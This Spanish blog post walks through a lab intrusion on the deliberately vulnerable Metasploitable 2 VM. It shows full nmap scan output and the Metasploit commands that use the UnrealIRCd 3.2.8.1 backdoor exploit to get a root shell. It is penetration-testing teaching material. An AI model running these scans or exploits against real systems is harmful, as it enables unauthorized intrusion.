viernes, 5 de agosto de 2016

Intrusión a metasploitable parte 4

Seguimos con la serie dedicada a metasploitable 2, que, como ya dijimos, era una distribución con un montón de vulnerabilidades para que podáis hacer vuestras pruebas de penetración.

nmap -sS -A 192.168.1.131

Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-01 11:43 CEST
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:43
Completed NSE at 11:43, 0.00s elapsed
Initiating NSE at 11:43
Completed NSE at 11:43, 0.00s elapsed
Initiating ARP Ping Scan at 11:43
Scanning 192.168.1.131 [1 port]
Completed ARP Ping Scan at 11:43, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:43
Completed Parallel DNS resolution of 1 host. at 11:43, 0.15s elapsed
Initiating SYN Stealth Scan at 11:43
Scanning 192.168.1.131 [1000 ports]
Discovered open port 21/tcp on 192.168.1.131
Discovered open port 139/tcp on 192.168.1.131
Discovered open port 111/tcp on 192.168.1.131
Discovered open port 5900/tcp on 192.168.1.131
Discovered open port 22/tcp on 192.168.1.131
Discovered open port 445/tcp on 192.168.1.131
Discovered open port 80/tcp on 192.168.1.131
Discovered open port 25/tcp on 192.168.1.131
Discovered open port 23/tcp on 192.168.1.131
Discovered open port 53/tcp on 192.168.1.131
Discovered open port 3306/tcp on 192.168.1.131
Discovered open port 8009/tcp on 192.168.1.131
Discovered open port 2049/tcp on 192.168.1.131
Discovered open port 1524/tcp on 192.168.1.131
Discovered open port 512/tcp on 192.168.1.131
Discovered open port 6667/tcp on 192.168.1.131
Discovered open port 6000/tcp on 192.168.1.131
Discovered open port 513/tcp on 192.168.1.131
Discovered open port 8180/tcp on 192.168.1.131
Discovered open port 2121/tcp on 192.168.1.131
Discovered open port 514/tcp on 192.168.1.131
Discovered open port 5432/tcp on 192.168.1.131
Discovered open port 1099/tcp on 192.168.1.131
Completed SYN Stealth Scan at 11:43, 0.15s elapsed (1000 total ports)
Initiating Service scan at 11:43
Scanning 23 services on 192.168.1.131
Completed Service scan at 11:43, 11.31s elapsed (23 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.131
NSE: Script scanning 192.168.1.131.
Initiating NSE at 11:43
Completed NSE at 11:44, 14.52s elapsed
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Nmap scan report for 192.168.1.131
Host is up (0.00059s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Issuer: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2010-03-17T14:07:45
| Not valid after:  2010-04-16T14:07:45
| MD5:   dcd9 ad90 6c8f 2f73 74af 383b 2540 8828
|_SHA-1: ed09 3088 7066 03bf d5dc 2373 99b4 98da 2d4d 31c6
|_ssl-date: 2016-07-01T09:43:21+00:00; -35s from scanner time.
53/tcp   open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41183/tcp  mountd
|   100005  1,2,3      49986/udp  mountd
|   100021  1,3,4      41855/udp  nlockmgr
|   100021  1,3,4      54128/tcp  nlockmgr
|   100024  1          42483/tcp  status
|_  100024  1          49051/udp  status
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  tcpwrapped
1099/tcp open  rmiregistry GNU Classpath grmiregistry
|_rmi-dumpregistry: Registry listing failed (No return data received from server)
1524/tcp open  shell       Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      41183/tcp  mountd
|   100005  1,2,3      49986/udp  mountd
|   100021  1,3,4      41855/udp  nlockmgr
|   100021  1,3,4      54128/tcp  nlockmgr
|   100024  1          42483/tcp  status
|_  100024  1          49051/udp  status
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 53
|   Version: .0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: SupportsTransactions, Support41Auth, SupportsCompression, SwitchToSSLAfterHandshake, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew
|   Status: Autocommit
|_  Salt: 7HD[!-`|m0EJ$q2@-^sH
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    Unknown security type (33554432)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         Unreal ircd
| irc-info: 
|   users: 1
|   servers: 1
|   lusers: 1
|   lservers: 0
|   server: irc.Metasploitable.LAN
|   version: Unreal3.2.8.1. irc.Metasploitable.LAN 
|   uptime: 0 days, 0:04:04
|   source ident: nmap
|   source host: 5AD5FCE2.78DED367.FFFA6D49.IP
|_  error: Closing Link: gjtkunzrr[192.168.1.134] (Quit: gjtkunzrr)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
MAC Address: 08:00:27:67:3E:A2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 497.102 days (since Fri Feb 20 08:16:41 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=202 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   METASPLOITABLE<00>   Flags: <unique><active>
|   METASPLOITABLE<03>   Flags: <unique><active>
|   METASPLOITABLE<20>   Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP
|_  System time: 2016-07-01T05:43:21-04:00

TRACEROUTE
HOP RTT     ADDRESS
1   0.59 ms 192.168.1.131

NSE: Script Post-scanning.
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Initiating NSE at 11:44
Completed NSE at 11:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.64 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.430KB)
Si nos fijamos, tenemos un demonio unreal irc en el puerto 6667. Irc es un protocolo de chat, el cual se usaba mucho antiguamente aunque, hoy por hoy, no son pocas las personas que lo siguen utilizando.

Buscamos en metasploit a ver si tenemos algún exploit por ahí...

search unreal



ah, pues sí.

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOST 192.168.1.131

Vamos a buscar los payloads para este exploit:

show payloads



Tenemos unos cuantos.



Configuramos, ponemos exploit y ...



Ah, y encima somos root.


No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.